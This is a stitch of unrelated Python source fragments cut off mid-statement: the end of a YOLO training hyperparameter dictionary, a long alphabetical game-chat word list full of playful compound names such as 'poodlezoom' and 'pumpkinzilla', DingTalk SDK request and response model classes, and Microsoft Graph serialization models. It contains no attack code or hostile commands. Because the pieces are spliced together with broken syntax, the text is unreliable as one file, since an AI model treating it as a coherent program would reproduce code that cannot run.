# gradient direction. Effectively simulates a batch_size that is
# `bstep` times bigger.
'batch_step': bstep,
},
'other': {
# Other params are not used internally, so you are free to set any
# extra params specific to your algorithm, and still have them
# logged in the hyperparam structure. For YOLO this is `ovthresh`.
'batch_size': batch_size,
'nice': nice,
'ovthresh': ovthresh, # used in mAP computation
'input_range': 'norm01',
},
})
print('max_epoch | |
'poodleflinger',
'poodleflip',
'poodleflipper',
'poodlefoot',
'poodlefuddy',
'poodlefussen',
'poodlegadget',
'poodlegargle',
'poodlegloop',
'poodleglop',
'poodlegoober',
'poodlegoose',
'poodlegrooven',
'poodlehoffer',
'poodlehopper',
'poodlejinks',
'poodleklunk',
'poodleknees',
'poodlemarble',
'poodlemash',
'poodlemonkey',
'poodlemooch',
'poodlemouth',
'poodlemuddle',
'poodlemuffin',
'poodlemush',
'poodlenerd',
'poodlenoodle',
'poodlenose',
'poodlenugget',
'poodlephew',
'poodlephooey',
'poodlepocket',
'poodlepoof',
'poodlepop',
'poodlepounce',
'poodlepow',
'poodlepretzel',
'poodlequack',
'poodleroni',
'poodlescooter',
'poodlescreech',
'poodlesmirk',
'poodlesnooker',
'poodlesnoop',
'poodlesnout',
'poodlesocks',
'poodlespeed',
'poodlespinner',
'poodlesplat',
'poodlesprinkles',
'poodlesticks',
'poodlestink',
'poodleswirl',
'poodleteeth',
'poodlethud',
'poodletoes',
'poodleton',
'poodletoon',
'poodletooth',
'poodletwist',
'poodlewhatsit',
'poodlewhip',
'poodlewig',
'poodlewoof',
'poodlezaner',
'poodlezap',
'poodlezapper',
'poodlezilla',
'poodlezoom',
"pooh's",
'pool',
'pooled',
'pooling',
'pools',
'poor',
'poorer',
'poorest',
'poorly',
'pop',
"pop's",
'popcorn',
'popcorns',
'poplar',
'poplin',
'popovers',
'poppenbee',
'poppenberry',
'poppenblabber',
'poppenbocker',
'poppenboing',
'poppenboom',
'poppenbounce',
'poppenbouncer',
'poppenbrains',
'poppenbubble',
'poppenbumble',
'poppenbump',
'poppenbumper',
'poppenburger',
'poppenchomp',
'poppencorn',
'poppencrash',
'poppencrumbs',
'poppencrump',
'poppencrunch',
'poppendoodle',
'poppendorf',
'poppenface',
'poppenfidget',
'poppenfink',
'poppenfish',
'poppenflap',
'poppenflapper',
'poppenflinger',
'poppenflip',
'poppenflipper',
'poppenfoot',
'poppenfuddy',
'poppenfussen',
'poppengadget',
'poppengargle',
'poppengloop',
'poppenglop',
'poppengoober',
'poppengoose',
'poppengrooven',
'poppenhoffer',
'poppenhopper',
'poppenjinks',
'poppenklunk',
'poppenknees',
'poppenmarble',
'poppenmash',
'poppenmonkey',
'poppenmooch',
'poppenmouth',
'poppenmuddle',
'poppenmuffin',
'poppenmush',
'poppennerd',
'poppennoodle',
'poppennose',
'poppennugget',
'poppenphew',
'poppenphooey',
'poppenpocket',
'poppenpoof',
'poppenpop',
'poppenpounce',
'poppenpow',
'poppenpretzel',
'poppenquack',
'poppenroni',
'poppenscooter',
'poppenscreech',
'poppensmirk',
'poppensnooker',
'poppensnoop',
'poppensnout',
'poppensocks',
'poppenspeed',
'poppenspinner',
'poppensplat',
'poppensprinkles',
'poppensticks',
'poppenstink',
'poppenswirl',
'poppenteeth',
'poppenthud',
'poppentoes',
'poppenton',
'poppentoon',
'poppentooth',
'poppentwist',
'poppenwhatsit',
'poppenwhip',
'poppenwig',
'poppenwoof',
'poppenzaner',
'poppenzap',
'poppenzapper',
'poppenzilla',
'poppenzoom',
'popping',
'poppins',
'poppy',
'poppy-puff',
'poppyseed',
'pops',
'popsicle',
'popsicles',
'popular',
'popularity',
'popularly',
'populate',
'populated',
'populates',
'populating',
'population',
'populations',
'popup',
'por',
'porch',
'porcupine',
'porgy',
'pork',
'porkchop',
'poro',
'porpoise',
'port',
'portable',
'portal',
'ported',
'porter',
'porters',
'porting',
'portly',
'portmouths',
'portrait',
'portraits',
'ports',
'porygon',
'pose',
'posh',
'posies',
'position',
'positioned',
'positioning',
'positions',
'positive',
'positively',
'positives',
'positivity',
'posse',
'possess',
'possessions',
'possibilities',
'possibility',
"possibility's",
'possible',
'possibles',
'possibly',
'possum',
"possum's",
'possums',
'post',
'post-concert',
'post-show',
'postcard',
'postcards',
'posted',
'poster',
'posters',
'posthaste',
'posting',
'postings',
'postman',
'postmaster',
'posts',
'postshow',
'posture',
'posy',
'pot',
'potato',
"potato's",
'potatoes',
'potatos',
'potc',
'potential',
'potentially',
'potentials',
'potion',
"potion's",
'potions',
'potpies',
'pots',
'pots-and-pans',
'potsen',
'potter',
'pouch',
'pouches',
'pounce',
'pour',
"pour's",
'poured',
'pourer',
'pourers',
'pouring',
'pours',
'pouty',
'pow',
'powder-burnt',
'powdered',
'powders',
'powe',
'power',
"power's",
'powered',
'powerful',
'powerfully',
'powerhouse',
'powering',
'powers',
'pox',
'ppl',
'practical',
'practicality',
'practically',
'practice',
"practice's",
'practices',
'practicing',
'prairie',
'prairies',
'pram',
'prank',
'pranked',
'pranks',
'pratt',
'prattle',
'prawn',
'pre',
'pre-concert',
'precious',
'preciousbee',
'preciousberry',
'preciousblabber',
'preciousbocker',
'preciousboing',
'preciousboom',
'preciousbounce',
'preciousbouncer',
'preciousbrains',
'preciousbubble',
'preciousbumble',
'preciousbump',
'preciousbumper',
'preciousburger',
'preciouschomp',
'preciouscorn',
'preciouscrash',
'preciouscrumbs',
'preciouscrump',
'preciouscrunch',
'preciousdoodle',
'preciousdorf',
'preciousface',
'preciousfidget',
'preciousfink',
'preciousfish',
'preciousflap',
'preciousflapper',
'preciousflinger',
'preciousflip',
'preciousflipper',
'preciousfoot',
'preciousfuddy',
'preciousfussen',
'preciousgadget',
'preciousgargle',
'preciousgloop',
'preciousglop',
'preciousgoober',
'preciousgoose',
'preciousgrooven',
'precioushoffer',
'precioushopper',
'preciousjinks',
'preciousklunk',
'preciousknees',
'preciousmarble',
'preciousmash',
'preciousmonkey',
'preciousmooch',
'preciousmouth',
'preciousmuddle',
'preciousmuffin',
'preciousmush',
'preciousnerd',
'preciousnoodle',
'preciousnose',
'preciousnugget',
'preciousphew',
'preciousphooey',
'preciouspocket',
'preciouspoof',
'preciouspop',
'preciouspounce',
'preciouspow',
'preciouspretzel',
'preciousquack',
'preciousroni',
'preciousscooter',
'preciousscreech',
'precioussmirk',
'precioussnooker',
'precioussnoop',
'precioussnout',
'precioussocks',
'preciousspeed',
'preciousspinner',
'precioussplat',
'precioussprinkles',
'precioussticks',
'preciousstink',
'preciousswirl',
'preciousteeth',
'preciousthud',
'precioustoes',
'preciouston',
'precioustoon',
'precioustooth',
'precioustwist',
'preciouswhatsit',
'preciouswhip',
'preciouswig',
'preciouswoof',
'preciouszaner',
'preciouszap',
'preciouszapper',
'preciouszilla',
'preciouszoom',
'precipice',
'precipitate',
'precipitated',
'precipitates',
'precipitating',
'precipitation',
'precisely',
'precocious',
'predicaments',
'predict',
'predictometer',
'predicts',
'pree',
'prefab',
'prefer',
'preference',
'preferences',
'preferred',
'prefers',
'prefix',
'prefixes',
'prehysterical',
'premiere',
'premium',
'prepare',
'prepared',
'preparedness',
'preparer',
'prepares',
'preparing',
'preposition',
'prepositions',
'prepostera',
'prescription',
'prescriptions',
'presence',
"presence's",
'presences',
'present',
'presentation',
'presentations',
'presented',
'presenter',
"presenter's",
'presenters',
'presenting',
'presently',
'presents',
'preserver',
'preservers',
'president',
"presidents'",
'press',
'pressed',
'presser',
'presses',
'pressing',
'pressings',
'presto',
'pretend',
'pretended',
'pretender',
"pretender's",
'pretenders',
'pretending',
'pretends',
'pretentious',
'prettied',
'prettier',
'pretties',
'prettiest',
'pretty',
'prettying',
'pretzel',
'pretzels',
'prev',
'prevent',
'prevented',
'preventer',
'preventing',
'prevention',
'preventive',
'prevents',
'preview',
'previous',
'previously',
'priate',
'price',
'priced',
'pricer',
'pricers',
'prices',
'pricing',
'prickly',
'pride',
"pride's",
'prigate',
'prilla',
"prilla's",
'prim',
'primape',
'primaries',
'primary',
"primary's",
'primate',
'prime',
'primed',
'primely',
'primer',
'primers',
'primes',
'priming',
'primitive',
'primp',
'primrose',
'prince',
"prince's",
'princely',
'princes',
'princess',
"princess's",
'princesses',
'principal',
"principal's",
'principals',
'principle',
'principled',
'principles',
'prinna',
'print',
'printed',
'printer',
"printer's",
'printers',
'printing',
'prints',
'prior',
'priorities',
'priority',
"priority's",
'pristine',
'privacy',
'privateer',
"privateer's",
'privateered',
'privateering',
'privateers',
'privilege',
'privileged',
'privileges',
'prix',
'prize',
'prized',
'prizer',
'prizers',
'prizes',
'prizing',
'prizmod',
"prizmod's",
'pro',
'proactive',
'prob',
'probability',
'probably',
'problem',
"problem's",
'problems',
'procastinators',
'procedure',
'procedures',
'proceed',
'proceeded',
'proceeding',
'proceedings',
'proceeds',
'process',
"process's",
'processed',
'processes',
'processing',
'proddy',
'prodigies',
'prodigy',
'produce',
'produced',
'producer',
'producers',
'produces',
'producing',
'product',
"product's",
'production',
'productive',
'products',
'prof',
'professor',
"professor's",
'professors',
'profile',
'profiles',
'profit',
"profit's",
'profited',
'profiter',
'profiters',
'profiting',
'profits',
'program',
"program's",
'programed',
'programing',
'programmer',
'programmers',
'programs',
'progress',
'progressed',
'progresses',
'progressing',
'progressive',
'prohibit',
'prohibited',
'prohibiting',
'prohibits',
'project',
"project's",
'projectaltis',
'projectaltis.com',
'projected',
'projectile',
'projecting',
'projective',
'projector',
'projectors',
'projects',
'prolly',
'prom',
'promise',
'promised',
'promiser',
'promises',
'promising',
'promo',
'promos',
'promote',
'promoted',
'promoter',
"promoter's",
'promoters',
'promotes',
'promoting',
'promotion',
'promotional',
'promotions',
'promotive',
'prompt',
'prompter',
'prompters',
'pronto',
'proof',
"proof's",
'proofed',
'proofer',
'proofing',
'proofs',
'prop',
'propeller',
'propellers',
'propellor',
'proper',
'properly',
'propertied',
'properties',
'property',
'proposal',
"proposal's",
'proposals',
'propose',
'proposes',
'proposition',
'props',
'prospect',
'prospected',
'prospecting',
'prospective',
'prospector',
"prospector's",
'prospects',
'prospit',
'protect',
'protected',
'protecting',
"protection's",
'protections',
'protective',
'protects',
'prototype',
'proud',
'proudest',
'prove',
'proved',
'prover',
"prover's",
'provers',
'proves',
'provide',
'provided',
'providence',
'provider',
'providers',
'provides',
'providing',
'proving',
'provoke',
'provoked',
'provokes',
'provoking',
'prow',
'prower',
'proximity',
'proxy',
'prudence',
'prunaprismia',
'prussia',
'prussian',
'prymme',
'ps2',
'ps3',
'ps4',
'psa',
'psp',
'psyched',
'psychic',
"psychic's",
'psychics',
'psyduck',
'pt',
'pt.',
'ptr',
'public',
'public pastes',
"public's",
'publicly',
'publics',
'publish',
'published',
'publisher',
"publisher's",
'publishers',
'publishes',
'publishing',
'pucca',
'puccas',
'puce',
'pucker',
'pudding',
'puddle',
'puddles',
'pudge',
'pufferang',
'puffle',
'puffles',
'puffy',
'pug',
"pugpratt's",
'pula',
'pull',
'pulled',
'puller',
'pulling',
'pullings',
'pullover',
'pullovers',
'pulls',
'pulse',
'pulyurleg',
'pumba',
"pumba's",
'pumbaa',
"pumbaa's",
'pumbaas',
'pummel',
'pump',
'pumpkin',
"pumpkin's",
'pumpkinbee',
'pumpkinberry',
'pumpkinblabber',
'pumpkinbocker',
'pumpkinboing',
'pumpkinboom',
'pumpkinbounce',
'pumpkinbouncer',
'pumpkinbrains',
'pumpkinbubble',
'pumpkinbumble',
'pumpkinbump',
'pumpkinbumper',
'pumpkinburger',
'pumpkinchomp',
'pumpkincorn',
'pumpkincrash',
'pumpkincrumbs',
'pumpkincrump',
'pumpkincrunch',
'pumpkindoodle',
'pumpkindorf',
'pumpkinface',
'pumpkinfidget',
'pumpkinfink',
'pumpkinfish',
'pumpkinflap',
'pumpkinflapper',
'pumpkinflinger',
'pumpkinflip',
'pumpkinflipper',
'pumpkinfoot',
'pumpkinfuddy',
'pumpkinfussen',
'pumpkingadget',
'pumpkingargle',
'pumpkingloop',
'pumpkinglop',
'pumpkingoober',
'pumpkingoose',
'pumpkingrooven',
'pumpkinhoffer',
'pumpkinhopper',
'pumpkinjinks',
'pumpkinklunk',
'pumpkinknees',
'pumpkinmarble',
'pumpkinmash',
'pumpkinmonkey',
'pumpkinmooch',
'pumpkinmouth',
'pumpkinmuddle',
'pumpkinmuffin',
'pumpkinmush',
'pumpkinnerd',
'pumpkinnoodle',
'pumpkinnose',
'pumpkinnugget',
'pumpkinphew',
'pumpkinphooey',
'pumpkinpocket',
'pumpkinpoof',
'pumpkinpop',
'pumpkinpounce',
'pumpkinpow',
'pumpkinpretzel',
'pumpkinquack',
'pumpkinroni',
'pumpkins',
'pumpkinscooter',
'pumpkinscreech',
'pumpkinsmirk',
'pumpkinsnooker',
'pumpkinsnoop',
'pumpkinsnout',
'pumpkinsocks',
'pumpkinspeed',
'pumpkinspinner',
'pumpkinsplat',
'pumpkinsprinkles',
'pumpkinsticks',
'pumpkinstink',
'pumpkinswirl',
'pumpkinteeth',
'pumpkinthud',
'pumpkintoes',
'pumpkinton',
'pumpkintoon',
'pumpkintooth',
'pumpkintwist',
'pumpkinwhatsit',
'pumpkinwhip',
'pumpkinwig',
'pumpkinwoof',
'pumpkinzaner',
'pumpkinzap',
'pumpkinzapper',
'pumpkinzilla',
'pumpkinzoom',
'pun',
'punchline',
'punchlines',
'punchy',
'punctuality',
'punctuation',
'punk',
'punny',
'puns',
'puny',
'pup',
'pupert',
"pupert's",
'pupil',
'pupils',
'puppet',
'puppets',
'puppies',
'puppy',
"puppy's",
'purchase',
'purchased',
'purchaser',
"purchaser's",
'purchasers',
'purchases',
'purchasing',
'pure',
'purebred',
'puree',
'purim',
"purim's",
'purple',
'purplebee',
'purpleberry',
'purpleblabber',
'purplebocker',
'purpleboing',
'purpleboom',
'purplebounce',
'purplebouncer',
'purplebrains',
'purplebubble',
'purplebumble',
'purplebump',
'purplebumper',
'purpleburger',
'purplechomp',
'purplecorn',
'purplecrash',
'purplecrumbs',
'purplecrump',
'purplecrunch',
'purpledoodle',
'purpledorf',
'purpleface',
'purplefidget',
'purplefink',
'purplefish',
'purpleflap',
'purpleflapper',
'purpleflinger',
'purpleflip',
'purpleflipper',
'purplefoot',
'purplefuddy',
'purplefussen',
'purplegadget',
'purplegargle',
'purplegloop',
'purpleglop',
'purplegoober',
'purplegoose',
'purplegrooven',
'purplehoffer',
'purplehopper',
'purplejinks',
'purpleklunk',
'purpleknees',
'purplemarble',
'purplemash',
'purplemonkey',
'purplemooch',
'purplemouth',
'purplemuddle',
'purplemuffin',
'purplemush',
'purplenerd',
'purplenoodle',
'purplenose',
'purplenugget',
'purplephew',
'purplephooey',
'purplepocket',
'purplepoof',
'purplepop',
'purplepounce',
'purplepow',
'purplepretzel',
'purplequack',
'purpleroni',
'purplescooter',
'purplescreech',
'purplesmirk',
'purplesnooker',
'purplesnoop',
'purplesnout',
'purplesocks',
'purplespeed',
'purplespinner',
'purplesplat',
'purplesprinkles',
'purplesticks',
'purplestink',
'purpleswirl',
'purpleteeth',
'purplethud',
'purpletoes',
'purpleton',
'purpletoon',
'purpletooth',
'purpletwist',
'purplewhatsit',
'purplewhip',
'purplewig',
'purplewoof',
'purplezaner',
'purplezap',
'purplezapper',
'purplezilla',
'purplezoom',
'purpose',
'purposed',
'purposely',
'purposes',
'purposing',
'purposive',
'purr',
'purr-fect',
'purr-fectly',
'purr-form',
'purrfect',
'purrfection',
'purrfectly',
'purrty',
'purse',
'pursuit',
'pursuits',
'push',
'pushed',
'pusher',
'pushers',
'pushes',
'pushing',
'put',
'putrid',
'puts',
'putt',
'putt-putt',
'putting',
'putts',
'puzzle',
'puzzled',
'puzzler',
"puzzler's",
'puzzlers',
'puzzles',
'puzzling',
'puzzlings',
'pvp',
'pwnage',
'pwncake',
'pwned',
'pyjama',
'pyjamas',
'pyle',
'pylon',
'pyramid',
'pyrate',
'pyrates',
'pyrats',
'pyro',
'python',
'qack',
'qc',
'quack',
'quacken',
'quacker',
'quackintosh',
'quackity',
'quacks',
'quacky',
'quad',
'quad-barrel',
'quad-barrels',
'quadrant',
'quadrilles',
'quads',
'quaint',
'quake',
'qualification',
'qualifications',
'qualified',
'qualifier',
"qualifier's",
'qualifiers',
'qualifies',
'qualify',
'qualifying',
'qualities',
'quality',
"quality's",
'quantities',
'quantity',
"quantity's",
'quantum',
'quarry',
'quarter',
'quarterdeck',
'quartered',
'quartering',
'quarterly',
'quarters',
'quartet',
'quasimodo',
"quasimodo's",
'quasimodos',
'quater',
'quaterers',
'quebec',
'quebecor',
'queen',
"queen's",
'queenly',
'queens',
'quentin',
"quentin's",
'queried',
'query',
'quesadilla',
'quesadillas',
'quest',
'questant',
'questants',
'quested',
'quester',
"quester's",
'questers',
'questing',
'question',
'questioned',
'questioner',
'questioners',
'questioning',
'questionings',
'questions',
'quests',
'queued',
'queuing',
'quick',
'quick-rot',
'quick-witted',
'quicken',
'quickens',
'quicker',
'quickest',
'quickly',
'quicksilver',
'quidditch',
'quiet',
'quieted',
'quieten',
'quietens',
'quieter',
'quietest',
'quieting',
'quietly',
'quiets',
'quilt',
'quilting',
'quilts',
'quinary',
'quintessential',
'quirtle',
'quit',
'quite',
'quits',
'quitting',
'quixotic',
'quiz',
'quizzed',
'quizzes',
'quizzical',
'quo',
'quote',
'quotes',
'r',
'r/toontown',
'rabbit',
"rabbit's",
'rabbits',
'raccoon',
"raccoon's",
'raccoons',
'race',
'raced',
'racer',
"racer's",
'racers',
'races',
'raceway',
'rachel',
'rachelle',
"racin'",
'racing',
'racket',
'rackets',
'rackham',
'rad',
'radar',
'radiant',
'radiate',
'radiator',
'radiators',
'radical',
'radio',
"radio's",
'radioed',
'radioing',
'radios',
'radishes',
'radius',
'rae',
'raff',
'raft',
"raft's",
'rafting',
'rafts',
'ragetti',
'ragged',
'ragtime',
'raichu',
'raid',
'raided',
'raider',
'raiders',
'raiding',
'raids',
'raikiri',
'rail',
'railing',
'railroad',
'railroaded',
'railroader',
'railroaders',
'railroading',
'railroads',
'rails',
'railstand',
'railwas',
'railway',
"railway's",
'rain',
"rain's",
'rainbow',
'rainbows',
'rained',
'raining',
'rains',
'rainstorms',
'rainy',
'raise',
'raised',
| |
None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetTrustDeviceListResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class ListMiniAppAvailableVersionHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class ListMiniAppAvailableVersionRequest(TeaModel):
def __init__(
self,
version_type_set: List[int] = None,
page_size: int = None,
page_number: int = None,
ding_isv_org_id: int = None,
ding_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
mini_app_id: str = None,
):
# 版本类型列表,0-开发版,1-灰度版,2-发布版,3-体验版
self.version_type_set = version_type_set
# 分页大小
self.page_size = page_size
# 分页数1
self.page_number = page_number
self.ding_isv_org_id = ding_isv_org_id
self.ding_org_id = ding_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
# 小程序id
self.mini_app_id = mini_app_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.version_type_set is not None:
result['versionTypeSet'] = self.version_type_set
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.page_number is not None:
result['pageNumber'] = self.page_number
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('versionTypeSet') is not None:
self.version_type_set = m.get('versionTypeSet')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('pageNumber') is not None:
self.page_number = m.get('pageNumber')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
return self
class ListMiniAppAvailableVersionResponseBodyList(TeaModel):
def __init__(
self,
build_status: int = None,
version: str = None,
):
# 打包状态,0-打包中,1-成功,2-失败
self.build_status = build_status
# 版本
self.version = version
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.build_status is not None:
result['buildStatus'] = self.build_status
if self.version is not None:
result['version'] = self.version
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('buildStatus') is not None:
self.build_status = m.get('buildStatus')
if m.get('version') is not None:
self.version = m.get('version')
return self
class ListMiniAppAvailableVersionResponseBody(TeaModel):
def __init__(
self,
list: List[ListMiniAppAvailableVersionResponseBodyList] = None,
):
# result
self.list = list
def validate(self):
if self.list:
for k in self.list:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['list'] = []
if self.list is not None:
for k in self.list:
result['list'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.list = []
if m.get('list') is not None:
for k in m.get('list'):
temp_model = ListMiniAppAvailableVersionResponseBodyList()
self.list.append(temp_model.from_map(k))
return self
class ListMiniAppAvailableVersionResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListMiniAppAvailableVersionResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListMiniAppAvailableVersionResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class SearchOrgInnerGroupInfoHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class SearchOrgInnerGroupInfoRequest(TeaModel):
def __init__(
self,
group_members_count_end: int = None,
sync_to_dingpan: int = None,
group_owner: str = None,
create_time_end: int = None,
page_size: int = None,
create_time_start: int = None,
uuid: str = None,
group_members_count_start: int = None,
last_active_time_end: int = None,
operator_user_id: str = None,
group_name: str = None,
page_start: int = None,
last_active_time_start: int = None,
):
# groupMembersCntEnd
self.group_members_count_end = group_members_count_end
# syncToDingpan
self.sync_to_dingpan = sync_to_dingpan
# groupOwner
self.group_owner = group_owner
# createTimeEnd
self.create_time_end = create_time_end
# pageSize
self.page_size = page_size
# createTimeStart
self.create_time_start = create_time_start
# uuid
self.uuid = uuid
# groupMembersCntStart
self.group_members_count_start = group_members_count_start
# lastActiveTimeEnd
self.last_active_time_end = last_active_time_end
# operatorUserId
self.operator_user_id = operator_user_id
# groupName
self.group_name = group_name
# pageStart
self.page_start = page_start
# lastActiveTimeStart
self.last_active_time_start = last_active_time_start
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.group_members_count_end is not None:
result['groupMembersCountEnd'] = self.group_members_count_end
if self.sync_to_dingpan is not None:
result['syncToDingpan'] = self.sync_to_dingpan
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.create_time_end is not None:
result['createTimeEnd'] = self.create_time_end
if self.page_size is not None:
result['pageSize'] = self.page_size
if self.create_time_start is not None:
result['createTimeStart'] = self.create_time_start
if self.uuid is not None:
result['uuid'] = self.uuid
if self.group_members_count_start is not None:
result['groupMembersCountStart'] = self.group_members_count_start
if self.last_active_time_end is not None:
result['lastActiveTimeEnd'] = self.last_active_time_end
if self.operator_user_id is not None:
result['operatorUserId'] = self.operator_user_id
if self.group_name is not None:
result['groupName'] = self.group_name
if self.page_start is not None:
result['pageStart'] = self.page_start
if self.last_active_time_start is not None:
result['lastActiveTimeStart'] = self.last_active_time_start
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('groupMembersCountEnd') is not None:
self.group_members_count_end = m.get('groupMembersCountEnd')
if m.get('syncToDingpan') is not None:
self.sync_to_dingpan = m.get('syncToDingpan')
if m.get('groupOwner') is not None:
self.group_owner = m.get('groupOwner')
if m.get('createTimeEnd') is not None:
self.create_time_end = m.get('createTimeEnd')
if m.get('pageSize') is not None:
self.page_size = m.get('pageSize')
if m.get('createTimeStart') is not None:
self.create_time_start = m.get('createTimeStart')
if m.get('uuid') is not None:
self.uuid = m.get('uuid')
if m.get('groupMembersCountStart') is not None:
self.group_members_count_start = m.get('groupMembersCountStart')
if m.get('lastActiveTimeEnd') is not None:
self.last_active_time_end = m.get('lastActiveTimeEnd')
if m.get('operatorUserId') is not None:
self.operator_user_id = m.get('operatorUserId')
if m.get('groupName') is not None:
self.group_name = m.get('groupName')
if m.get('pageStart') is not None:
self.page_start = m.get('pageStart')
if m.get('lastActiveTimeStart') is not None:
self.last_active_time_start = m.get('lastActiveTimeStart')
return self
class SearchOrgInnerGroupInfoResponseBodyItems(TeaModel):
def __init__(
self,
open_conversation_id: str = None,
group_owner: str = None,
group_name: str = None,
group_admins_count: int = None,
group_members_count: int = None,
group_create_time: int = None,
group_last_active_time: int = None,
group_last_active_time_show: str = None,
sync_to_dingpan: int = None,
used_quota: int = None,
group_owner_user_id: str = None,
status: int = None,
template_id: str = None,
template_name: str = None,
):
self.open_conversation_id = open_conversation_id
self.group_owner = group_owner
self.group_name = group_name
self.group_admins_count = group_admins_count
self.group_members_count = group_members_count
self.group_create_time = group_create_time
self.group_last_active_time = group_last_active_time
self.group_last_active_time_show = group_last_active_time_show
self.sync_to_dingpan = sync_to_dingpan
self.used_quota = used_quota
self.group_owner_user_id = group_owner_user_id
self.status = status
self.template_id = template_id
self.template_name = template_name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.open_conversation_id is not None:
result['openConversationId'] = self.open_conversation_id
if self.group_owner is not None:
result['groupOwner'] = self.group_owner
if self.group_name is not None:
result['groupName'] = self.group_name
| |
kwargs.get('target', None)
self.details = kwargs.get('details', None)
self.innererror = kwargs.get('innererror', None)
class Paths10WpgkzCommunicationsMicrosoftGraphGetpresencesbyuseridPostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths10WpgkzCommunicationsMicrosoftGraphGetpresencesbyuseridPostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param ids:
:type ids: list[str]
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'ids': {'key': 'ids', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(Paths10WpgkzCommunicationsMicrosoftGraphGetpresencesbyuseridPostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
self.additional_properties = kwargs.get('additional_properties', None)
self.ids = kwargs.get('ids', None)
class Paths13Zt223CommunicationsCallsCallIdMicrosoftGraphMutePostRequestbodyContentApplicationJsonSchema(msrest.serialization.Model):
"""Paths13Zt223CommunicationsCallsCallIdMicrosoftGraphMutePostRequestbodyContentApplicationJsonSchema.
:param additional_properties: Unmatched properties from the message are deserialized to this
collection.
:type additional_properties: dict[str, object]
:param client_context:
:type client_context: str
"""
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'client_context': {'key': 'clientContext', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Paths13Zt223CommunicationsCallsCallIdMicrosoftGraphMutePostRequestbodyContentApplicationJsonSchema, self).__init__(**kwargs)
